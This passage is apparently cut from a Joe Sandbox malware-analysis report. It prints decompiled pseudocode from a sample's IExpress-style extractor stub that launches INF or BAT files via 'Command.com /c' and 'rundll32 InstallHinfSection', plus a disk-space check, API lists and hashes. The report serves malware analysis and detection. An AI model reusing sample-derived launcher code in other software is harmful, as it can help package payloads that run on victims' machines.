				} else {
					_t132 = _t156;
					_t148 =  &(_t132[1]);
					do {
						_t105 =  *_t132;
						_t132 =  &(_t132[1]);
					} while (_t105 != 0);
					_t111 = _t132 - _t148;
					if(_t111 < 3) {
						goto L12;
					}
					_t106 = _t156[1];
					if(_t106 != 0x3a || _t156[2] != 0x5c) {
						if( *_t156 != 0x5c || _t106 != 0x5c) {
							goto L12;
						} else {
							goto L11;
						}
					} else {
						L11:
						E00A91680( &_v268, 0x104, _t156);
						L13:
						_t138 = 0x2e;
						_t57 = E00A966C8(_t156, _t138);
						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
							_t139 = 0x2e;
							_t115 = _t156;
							_t58 = E00A966C8(_t115, _t139);
							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
								_t156 = LocalAlloc(0x40, 0x400);
								if(_t156 == 0) {
									goto L43;
								}
								_t65 = GetFileAttributesA( &_v268); // executed
								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
									E00A91680( &_v1552, 0x400, _t108);
								} else {
									_push(_t115);
									_t108 = 0x400;
									E00A91781( &_v1552, 0x400, _t115,  &_v268);
									if(_t151 != 0 &&  *_t151 != 0) {
										E00A916B3( &_v1552, 0x400, " ");
										E00A916B3( &_v1552, 0x400, _t151);
									}
								}
								_t140 = _t156;
								 *_t156 = 0;
								E00A92AAC( &_v1552, _t156, _t156);
								goto L53;
							} else {
								_t108 = "Command.com /c %s";
								_t125 = "Command.com /c %s";
								_t145 = _t125 + 1;
								do {
									_t76 =  *_t125;
									_t125 = _t125 + 1;
								} while (_t76 != 0);
								_t126 = _t125 - _t145;
								_t146 =  &_v268;
								_t157 = _t146 + 1;
								do {
									_t77 =  *_t146;
									_t146 = _t146 + 1;
								} while (_t77 != 0);
								_t140 = _t146 - _t157;
								_t154 = _t126 + 8 + _t146 - _t157;
								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
								if(_t156 != 0) {
									E00A9171E(_t156, _t154, "Command.com /c %s",  &_v268);
									goto L53;
								}
								goto L43;
							}
						} else {
							_t85 = GetFileAttributesA( &_v268);
							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
								_t140 = 0x525;
								_push(0);
								_push(0x10);
								_push(0);
								_t60 =  &_v268;
								goto L35;
							} else {
								_t140 = "[";
								_v1556 = _t151;
								_t90 = E00A91A84( &_v1556, "[");
								if(_t90 != 0) {
									if( *_t90 != 0) {
										_v1556 = _t90;
									}
									_t140 = "]";
									E00A91A84( &_v1556, "]");
								}
								_t156 = LocalAlloc(0x40, 0x200);
								if(_t156 == 0) {
									L43:
									_t60 = 0;
									_t140 = 0x4b5;
									_push(0);
									_push(0x10);
									_push(0);
									L35:
									_push(_t60);
									E00A944B9(0, _t140);
									_t62 = 0;
									goto L54;
								} else {
									_t155 = _v1556;
									_t92 = _t155;
									if( *_t155 == 0) {
										_t92 = "DefaultInstall";
									}
									 *0xa99120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
									 *_v1560 = 1;
									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0xa91140, _t156, 8,  &_v268) == 0) {
										 *0xa99a34 =  *0xa99a34 & 0xfffffffb;
										if( *0xa99a40 != 0) {
											_t108 = "setupapi.dll";
										} else {
											_t108 = "setupx.dll";
											GetShortPathNameA( &_v268,  &_v268, 0x104);
										}
										if( *_t155 == 0) {
											_t155 = "DefaultInstall";
										}
										_push( &_v268);
										_push(_t155);
										E00A9171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
									} else {
										 *0xa99a34 =  *0xa99a34 | 0x00000004;
										if( *_t155 == 0) {
											_t155 = "DefaultInstall";
										}
										E00A91680(_t108, 0x104, _t155);
										_t140 = 0x200;
										E00A91680(_t156, 0x200,  &_v268);
									}
									L53:
									_t62 = 1;
									 *_v1564 = _t156;
									L54:
									_pop(_t152);
									return E00A96CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
								}
							}
						}
					}
				}
			}














































                                                                                                                                                                                                        0x00a91af3
                                                                                                                                                                                                        0x00a91afa
                                                                                                                                                                                                        0x00a91b07
                                                                                                                                                                                                        0x00a91b09
                                                                                                                                                                                                        0x00a91b1a
                                                                                                                                                                                                        0x00a91b20
                                                                                                                                                                                                        0x00a91b2c
                                                                                                                                                                                                        0x00a91b3b
                                                                                                                                                                                                        0x00a91b40
                                                                                                                                                                                                        0x00a91b2e
                                                                                                                                                                                                        0x00a91b2e
                                                                                                                                                                                                        0x00a91b33
                                                                                                                                                                                                        0x00a91b33
                                                                                                                                                                                                        0x00a91b46
                                                                                                                                                                                                        0x00a91b4c
                                                                                                                                                                                                        0x00a91b52
                                                                                                                                                                                                        0x00a91b57
                                                                                                                                                                                                        0x00a91b5d
                                                                                                                                                                                                        0x00a91b61
                                                                                                                                                                                                        0x00a91b9f
                                                                                                                                                                                                        0x00a91b9f
                                                                                                                                                                                                        0x00a91bb1
                                                                                                                                                                                                        0x00a91bc2
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a91b63
                                                                                                                                                                                                        0x00a91b63
                                                                                                                                                                                                        0x00a91b65
                                                                                                                                                                                                        0x00a91b68
                                                                                                                                                                                                        0x00a91b68
                                                                                                                                                                                                        0x00a91b6a
                                                                                                                                                                                                        0x00a91b6b
                                                                                                                                                                                                        0x00a91b6f
                                                                                                                                                                                                        0x00a91b74
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a91b76
                                                                                                                                                                                                        0x00a91b7b
                                                                                                                                                                                                        0x00a91b86
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a91b8c
                                                                                                                                                                                                        0x00a91b8c
                                                                                                                                                                                                        0x00a91b98
                                                                                                                                                                                                        0x00a91bc7
                                                                                                                                                                                                        0x00a91bc9
                                                                                                                                                                                                        0x00a91bcc
                                                                                                                                                                                                        0x00a91bd3
                                                                                                                                                                                                        0x00a91d75
                                                                                                                                                                                                        0x00a91d76
                                                                                                                                                                                                        0x00a91d78
                                                                                                                                                                                                        0x00a91d7f
                                                                                                                                                                                                        0x00a91e05
                                                                                                                                                                                                        0x00a91e09
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a91e12
                                                                                                                                                                                                        0x00a91e1b
                                                                                                                                                                                                        0x00a91e73
                                                                                                                                                                                                        0x00a91e21
                                                                                                                                                                                                        0x00a91e21
                                                                                                                                                                                                        0x00a91e28
                                                                                                                                                                                                        0x00a91e37
                                                                                                                                                                                                        0x00a91e3e
                                                                                                                                                                                                        0x00a91e52
                                                                                                                                                                                                        0x00a91e60
                                                                                                                                                                                                        0x00a91e60
                                                                                                                                                                                                        0x00a91e3e
                                                                                                                                                                                                        0x00a91e79
                                                                                                                                                                                                        0x00a91e7b
                                                                                                                                                                                                        0x00a91e84
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a91d9b
                                                                                                                                                                                                        0x00a91d9b
                                                                                                                                                                                                        0x00a91da0
                                                                                                                                                                                                        0x00a91da2
                                                                                                                                                                                                        0x00a91da5
                                                                                                                                                                                                        0x00a91da5
                                                                                                                                                                                                        0x00a91da7
                                                                                                                                                                                                        0x00a91da8
                                                                                                                                                                                                        0x00a91dac
                                                                                                                                                                                                        0x00a91dae
                                                                                                                                                                                                        0x00a91db4
                                                                                                                                                                                                        0x00a91db7
                                                                                                                                                                                                        0x00a91db7
                                                                                                                                                                                                        0x00a91db9
                                                                                                                                                                                                        0x00a91dba
                                                                                                                                                                                                        0x00a91dbe
                                                                                                                                                                                                        0x00a91dc3
                                                                                                                                                                                                        0x00a91dce
                                                                                                                                                                                                        0x00a91dd2
                                                                                                                                                                                                        0x00a91deb
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a91df0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a91dd2
                                                                                                                                                                                                        0x00a91bf7
                                                                                                                                                                                                        0x00a91bfe
                                                                                                                                                                                                        0x00a91c07
                                                                                                                                                                                                        0x00a91d55
                                                                                                                                                                                                        0x00a91d5a
                                                                                                                                                                                                        0x00a91d5b
                                                                                                                                                                                                        0x00a91d5d
                                                                                                                                                                                                        0x00a91d5e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a91c1b
                                                                                                                                                                                                        0x00a91c1b
                                                                                                                                                                                                        0x00a91c20
                                                                                                                                                                                                        0x00a91c2c
                                                                                                                                                                                                        0x00a91c33
                                                                                                                                                                                                        0x00a91c38
                                                                                                                                                                                                        0x00a91c3a
                                                                                                                                                                                                        0x00a91c3a
                                                                                                                                                                                                        0x00a91c40
                                                                                                                                                                                                        0x00a91c4b
                                                                                                                                                                                                        0x00a91c4b
                                                                                                                                                                                                        0x00a91c5d
                                                                                                                                                                                                        0x00a91c61
                                                                                                                                                                                                        0x00a91dd4
                                                                                                                                                                                                        0x00a91dd4
                                                                                                                                                                                                        0x00a91dd6
                                                                                                                                                                                                        0x00a91ddb
                                                                                                                                                                                                        0x00a91ddc
                                                                                                                                                                                                        0x00a91dde
                                                                                                                                                                                                        0x00a91d64
                                                                                                                                                                                                        0x00a91d64
                                                                                                                                                                                                        0x00a91d67
                                                                                                                                                                                                        0x00a91d6c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a91c67
                                                                                                                                                                                                        0x00a91c67
                                                                                                                                                                                                        0x00a91c6d
                                                                                                                                                                                                        0x00a91c72
                                                                                                                                                                                                        0x00a91c74
                                                                                                                                                                                                        0x00a91c74
                                                                                                                                                                                                        0x00a91c8e
                                                                                                                                                                                                        0x00a91c99
                                                                                                                                                                                                        0x00a91cc0
                                                                                                                                                                                                        0x00a91cf8
                                                                                                                                                                                                        0x00a91d07
                                                                                                                                                                                                        0x00a91d23
                                                                                                                                                                                                        0x00a91d09
                                                                                                                                                                                                        0x00a91d14
                                                                                                                                                                                                        0x00a91d1b
                                                                                                                                                                                                        0x00a91d1b
                                                                                                                                                                                                        0x00a91d2b
                                                                                                                                                                                                        0x00a91d2d
                                                                                                                                                                                                        0x00a91d2d
                                                                                                                                                                                                        0x00a91d38
                                                                                                                                                                                                        0x00a91d39
                                                                                                                                                                                                        0x00a91d46
                                                                                                                                                                                                        0x00a91cc2
                                                                                                                                                                                                        0x00a91cc2
                                                                                                                                                                                                        0x00a91ccc
                                                                                                                                                                                                        0x00a91cce
                                                                                                                                                                                                        0x00a91cce
                                                                                                                                                                                                        0x00a91cdb
                                                                                                                                                                                                        0x00a91ce6
                                                                                                                                                                                                        0x00a91cee
                                                                                                                                                                                                        0x00a91cee
                                                                                                                                                                                                        0x00a91e89
                                                                                                                                                                                                        0x00a91e91
                                                                                                                                                                                                        0x00a91e92
                                                                                                                                                                                                        0x00a91e94
                                                                                                                                                                                                        0x00a91e97
                                                                                                                                                                                                        0x00a91ea4
                                                                                                                                                                                                        0x00a91ea4
                                                                                                                                                                                                        0x00a91c61
                                                                                                                                                                                                        0x00a91c07
                                                                                                                                                                                                        0x00a91bd3
                                                                                                                                                                                                        0x00a91b7b

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00A91BE7
                                                                                                                                                                                                        • GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00A91BFE
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00A91C57
                                                                                                                                                                                                        • GetPrivateProfileIntA.KERNEL32 ref: 00A91C88
                                                                                                                                                                                                        • GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,00A91140,00000000,00000008,?), ref: 00A91CB8
                                                                                                                                                                                                        • GetShortPathNameA.KERNEL32 ref: 00A91D1B
                                                                                                                                                                                                          • Part of subcall function 00A944B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A94518
                                                                                                                                                                                                          • Part of subcall function 00A944B9: MessageBoxA.USER32(?,?,photo660,00010010), ref: 00A94554
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                                                                                                                                                                        • String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                                                                                                                                                                        • API String ID: 383838535-3368923722
                                                                                                                                                                                                        • Opcode ID: 8d25754929aeedff1ebb02f4d78229649ec1df0b82b6118ea4c2d8ff986a068a
                                                                                                                                                                                                        • Instruction ID: d4cba36836da309a0e1db60ab8d05c45a98a424b864731fc4b1fd5f4c4a35f0c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8d25754929aeedff1ebb02f4d78229649ec1df0b82b6118ea4c2d8ff986a068a
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 59A13670B0021A6BEF20DB24CC45BFA77E9EB55310F24079AE555A72D0EFB08E86CB50
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00A9597D Relevance: 19.7, APIs: 13, Instructions: 212windowCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 324 a9597d-a959b9 GetCurrentDirectoryA SetCurrentDirectoryA 325 a959bb-a959d8 call a944b9 call a96285 324->325 326 a959dd-a95a1b GetDiskFreeSpaceA 324->326 343 a95c05-a95c14 call a96ce0 325->343 328 a95ba1-a95bde memset call a96285 GetLastError FormatMessageA 326->328 329 a95a21-a95a4a MulDiv 326->329 339 a95be3-a95bfc call a944b9 SetCurrentDirectoryA 328->339 329->328 332 a95a50-a95a6c GetVolumeInformationA 329->332 335 a95a6e-a95ab0 memset call a96285 GetLastError FormatMessageA 332->335 336 a95ab5-a95aca SetCurrentDirectoryA 332->336 335->339 337 a95acc-a95ad1 336->337 341 a95ad3-a95ad8 337->341 342 a95ae2-a95ae4 337->342 351 a95c02 339->351 341->342 347 a95ada-a95ae0 341->347 349 a95ae7-a95af8 342->349 350 a95ae6 342->350 347->337 347->342 353 a95af9-a95afb 349->353 350->349 354 a95c04 351->354 355 a95afd-a95b03 353->355 356 a95b05-a95b08 353->356 354->343 355->353 355->356 357 a95b0a-a95b1b call a944b9 356->357 358 a95b20-a95b27 356->358 357->351 360 a95b29-a95b33 358->360 361 a95b52-a95b5b 358->361 360->361 364 a95b35-a95b50 360->364 362 a95b62-a95b6d 361->362 365 a95b6f-a95b74 362->365 366 a95b76-a95b7d 362->366 364->362 367 a95b85 365->367 368 a95b7f-a95b81 366->368 369 a95b83 366->369 370 a95b87-a95b94 call a9268b 367->370 371 a95b96-a95b9f 367->371 368->367 369->367 370->354 371->354
                                                                                                                                                                                                        C-Code - Quality: 96%
                                                                                                                                                                                                        			E00A9597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
				signed int _v8;
				char _v16;
				char _v276;
				char _v788;
				long _v792;
				long _v796;
				long _v800;
				signed int _v804;
				long _v808;
				int _v812;
				long _v816;
				long _v820;
				void* __ebx;
				void* __esi;
				signed int _t46;
				int _t50;
				signed int _t55;
				void* _t66;
				int _t69;
				signed int _t73;
				signed short _t78;
				signed int _t87;
				signed int _t101;
				int _t102;
				unsigned int _t103;
				unsigned int _t105;
				signed int _t111;
				long _t112;
				signed int _t116;
				CHAR* _t118;
				signed int _t119;
				signed int _t120;

				_t114 = __edi;
				_t46 =  *0xa98004; // 0x6298f871
				_v8 = _t46 ^ _t120;
				_v804 = __edx;
				_t118 = __ecx;
				GetCurrentDirectoryA(0x104,  &_v276);
				_t50 = SetCurrentDirectoryA(_t118); // executed
				if(_t50 != 0) {
					_push(__edi);
					_v796 = 0;
					_v792 = 0;
					_v800 = 0;
					_v808 = 0;
					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
					__eflags = _t55;
					if(_t55 == 0) {
						L29:
						memset( &_v788, 0, 0x200);
						 *0xa99124 = E00A96285();
						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
						_t110 = 0x4b0;
						L30:
						__eflags = 0;
						E00A944B9(0, _t110, _t118,  &_v788, 0x10, 0);
						SetCurrentDirectoryA( &_v276);
						L31:
						_t66 = 0;
						__eflags = 0;
						L32:
						_pop(_t114);
						goto L33;
					}
					_t69 = _v792 * _v796;
					_v812 = _t69;
					_t116 = MulDiv(_t69, _v800, 0x400);
					__eflags = _t116;
					if(_t116 == 0) {
						goto L29;
					}
					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
					__eflags = _t73;
					if(_t73 != 0) {
						SetCurrentDirectoryA( &_v276); // executed
						_t101 =  &_v16;
						_t111 = 6;
						_t119 = _t118 - _t101;
						__eflags = _t119;
						while(1) {
							_t22 = _t111 - 4; // 0x2
							__eflags = _t22;
							if(_t22 == 0) {
								break;
							}
							_t87 =  *((intOrPtr*)(_t119 + _t101));
							__eflags = _t87;
							if(_t87 == 0) {
								break;
							}
							 *_t101 = _t87;
							_t101 = _t101 + 1;
							_t111 = _t111 - 1;
							__eflags = _t111;
							if(_t111 != 0) {
								continue;
							}
							break;
						}
						__eflags = _t111;
						if(_t111 == 0) {
							_t101 = _t101 - 1;
							__eflags = _t101;
						}
						 *_t101 = 0;
						_t112 = 0x200;
						_t102 = _v812;
						_t78 = 0;
						_t118 = 8;
						while(1) {
							__eflags = _t102 - _t112;
							if(_t102 == _t112) {
								break;
							}
							_t112 = _t112 + _t112;
							_t78 = _t78 + 1;
							__eflags = _t78 - _t118;
							if(_t78 < _t118) {
								continue;
							}
							break;
						}
						__eflags = _t78 - _t118;
						if(_t78 != _t118) {
							__eflags =  *0xa99a34 & 0x00000008;
							if(( *0xa99a34 & 0x00000008) == 0) {
								L20:
								_t103 =  *0xa99a38; // 0x0
								_t110 =  *((intOrPtr*)(0xa989e0 + (_t78 & 0x0000ffff) * 4));
								L21:
								__eflags = (_v804 & 0x00000003) - 3;
								if((_v804 & 0x00000003) != 3) {
									__eflags = _v804 & 0x00000001;
									if((_v804 & 0x00000001) == 0) {
										__eflags = _t103 - _t116;
									} else {
										__eflags = _t110 - _t116;
									}
								} else {
									__eflags = _t103 + _t110 - _t116;
								}
								if(__eflags <= 0) {
									 *0xa99124 = 0;
									_t66 = 1;
								} else {
									_t66 = E00A9268B(_a4, _t110, _t103,  &_v16);
								}
								goto L32;
							}
							__eflags = _v816 & 0x00008000;
							if((_v816 & 0x00008000) == 0) {
								goto L20;
							}
							_t105 =  *0xa99a38; // 0x0
							_t110 =  *((intOrPtr*)(0xa989e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0xa989e0 + (_t78 & 0x0000ffff) * 4));
							_t103 = (_t105 >> 2) +  *0xa99a38;
							goto L21;
						}
						_t110 = 0x4c5;
						E00A944B9(0, 0x4c5, 0, 0, 0x10, 0);
						goto L31;
					}
					memset( &_v788, 0, 0x200);
					 *0xa99124 = E00A96285();
					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
					_t110 = 0x4f9;
					goto L30;
				} else {
					_t110 = 0x4bc;
					E00A944B9(0, 0x4bc, 0, 0, 0x10, 0);
					 *0xa99124 = E00A96285();
					_t66 = 0;
					L33:
					return E00A96CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
				}
			}



































                                                                                                                                                                                                        0x00a9597d
                                                                                                                                                                                                        0x00a95988
                                                                                                                                                                                                        0x00a9598f
                                                                                                                                                                                                        0x00a9599a
                                                                                                                                                                                                        0x00a959a6
                                                                                                                                                                                                        0x00a959a8
                                                                                                                                                                                                        0x00a959af
                                                                                                                                                                                                        0x00a959b9
                                                                                                                                                                                                        0x00a959dd
                                                                                                                                                                                                        0x00a959e4
                                                                                                                                                                                                        0x00a959f1
                                                                                                                                                                                                        0x00a959fe
                                                                                                                                                                                                        0x00a95a0b
                                                                                                                                                                                                        0x00a95a13
                                                                                                                                                                                                        0x00a95a19
                                                                                                                                                                                                        0x00a95a1b
                                                                                                                                                                                                        0x00a95ba1
                                                                                                                                                                                                        0x00a95baf
                                                                                                                                                                                                        0x00a95bbd
                                                                                                                                                                                                        0x00a95bd8
                                                                                                                                                                                                        0x00a95bde
                                                                                                                                                                                                        0x00a95be3
                                                                                                                                                                                                        0x00a95bec
                                                                                                                                                                                                        0x00a95bf0
                                                                                                                                                                                                        0x00a95bfc
                                                                                                                                                                                                        0x00a95c02
                                                                                                                                                                                                        0x00a95c02
                                                                                                                                                                                                        0x00a95c02
                                                                                                                                                                                                        0x00a95c04
                                                                                                                                                                                                        0x00a95c04
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a95c04
                                                                                                                                                                                                        0x00a95a27
                                                                                                                                                                                                        0x00a95a3a
                                                                                                                                                                                                        0x00a95a46
                                                                                                                                                                                                        0x00a95a48
                                                                                                                                                                                                        0x00a95a4a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a95a64
                                                                                                                                                                                                        0x00a95a6a
                                                                                                                                                                                                        0x00a95a6c
                                                                                                                                                                                                        0x00a95abc
                                                                                                                                                                                                        0x00a95ac2
                                                                                                                                                                                                        0x00a95ac9
                                                                                                                                                                                                        0x00a95aca
                                                                                                                                                                                                        0x00a95aca
                                                                                                                                                                                                        0x00a95acc
                                                                                                                                                                                                        0x00a95acc
                                                                                                                                                                                                        0x00a95acf
                                                                                                                                                                                                        0x00a95ad1
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a95ad3
                                                                                                                                                                                                        0x00a95ad6
                                                                                                                                                                                                        0x00a95ad8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a95ada
                                                                                                                                                                                                        0x00a95adc
                                                                                                                                                                                                        0x00a95add
                                                                                                                                                                                                        0x00a95add
                                                                                                                                                                                                        0x00a95ae0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a95ae0
                                                                                                                                                                                                        0x00a95ae2
                                                                                                                                                                                                        0x00a95ae4
                                                                                                                                                                                                        0x00a95ae6
                                                                                                                                                                                                        0x00a95ae6
                                                                                                                                                                                                        0x00a95ae6
                                                                                                                                                                                                        0x00a95ae9
                                                                                                                                                                                                        0x00a95aeb
                                                                                                                                                                                                        0x00a95af0
                                                                                                                                                                                                        0x00a95af6
                                                                                                                                                                                                        0x00a95af8
                                                                                                                                                                                                        0x00a95af9
                                                                                                                                                                                                        0x00a95af9
                                                                                                                                                                                                        0x00a95afb
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a95afd
                                                                                                                                                                                                        0x00a95aff
                                                                                                                                                                                                        0x00a95b00
                                                                                                                                                                                                        0x00a95b03
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a95b03
                                                                                                                                                                                                        0x00a95b05
                                                                                                                                                                                                        0x00a95b08
                                                                                                                                                                                                        0x00a95b20
                                                                                                                                                                                                        0x00a95b27
                                                                                                                                                                                                        0x00a95b52
                                                                                                                                                                                                        0x00a95b52
                                                                                                                                                                                                        0x00a95b5b
                                                                                                                                                                                                        0x00a95b62
                                                                                                                                                                                                        0x00a95b6b
                                                                                                                                                                                                        0x00a95b6d
                                                                                                                                                                                                        0x00a95b76
                                                                                                                                                                                                        0x00a95b7d
                                                                                                                                                                                                        0x00a95b83
                                                                                                                                                                                                        0x00a95b7f
                                                                                                                                                                                                        0x00a95b7f
                                                                                                                                                                                                        0x00a95b7f
                                                                                                                                                                                                        0x00a95b6f
                                                                                                                                                                                                        0x00a95b72
                                                                                                                                                                                                        0x00a95b72
                                                                                                                                                                                                        0x00a95b85
                                                                                                                                                                                                        0x00a95b98
                                                                                                                                                                                                        0x00a95b9e
                                                                                                                                                                                                        0x00a95b87
                                                                                                                                                                                                        0x00a95b8f
                                                                                                                                                                                                        0x00a95b8f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a95b85
                                                                                                                                                                                                        0x00a95b29
                                                                                                                                                                                                        0x00a95b33
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a95b35
                                                                                                                                                                                                        0x00a95b48
                                                                                                                                                                                                        0x00a95b4a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a95b4a
                                                                                                                                                                                                        0x00a95b0f
                                                                                                                                                                                                        0x00a95b16
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a95b16
                                                                                                                                                                                                        0x00a95a7c
                                                                                                                                                                                                        0x00a95a8a
                                                                                                                                                                                                        0x00a95aa5
                                                                                                                                                                                                        0x00a95aab
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a959bb
                                                                                                                                                                                                        0x00a959c0
                                                                                                                                                                                                        0x00a959c7
                                                                                                                                                                                                        0x00a959d1
                                                                                                                                                                                                        0x00a959d6
                                                                                                                                                                                                        0x00a95c05
                                                                                                                                                                                                        0x00a95c14
                                                                                                                                                                                                        0x00a95c14

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 00A959A8
                                                                                                                                                                                                        • SetCurrentDirectoryA.KERNELBASE(?), ref: 00A959AF
                                                                                                                                                                                                        • GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 00A95A13
                                                                                                                                                                                                        • MulDiv.KERNEL32(?,?,00000400), ref: 00A95A40
                                                                                                                                                                                                        • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00A95A64
                                                                                                                                                                                                        • memset.MSVCRT ref: 00A95A7C
                                                                                                                                                                                                        • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00A95A98
                                                                                                                                                                                                        • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00A95AA5
                                                                                                                                                                                                        • SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 00A95BFC
                                                                                                                                                                                                          • Part of subcall function 00A944B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A94518
                                                                                                                                                                                                          • Part of subcall function 00A944B9: MessageBoxA.USER32(?,?,photo660,00010010), ref: 00A94554
                                                                                                                                                                                                          • Part of subcall function 00A96285: GetLastError.KERNEL32(00A95BBC), ref: 00A96285
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 4237285672-0
                                                                                                                                                                                                        • Opcode ID: b11e817378ebe02390b720db536c2ce21954295fecb5a09bb8fbf75a3504b924
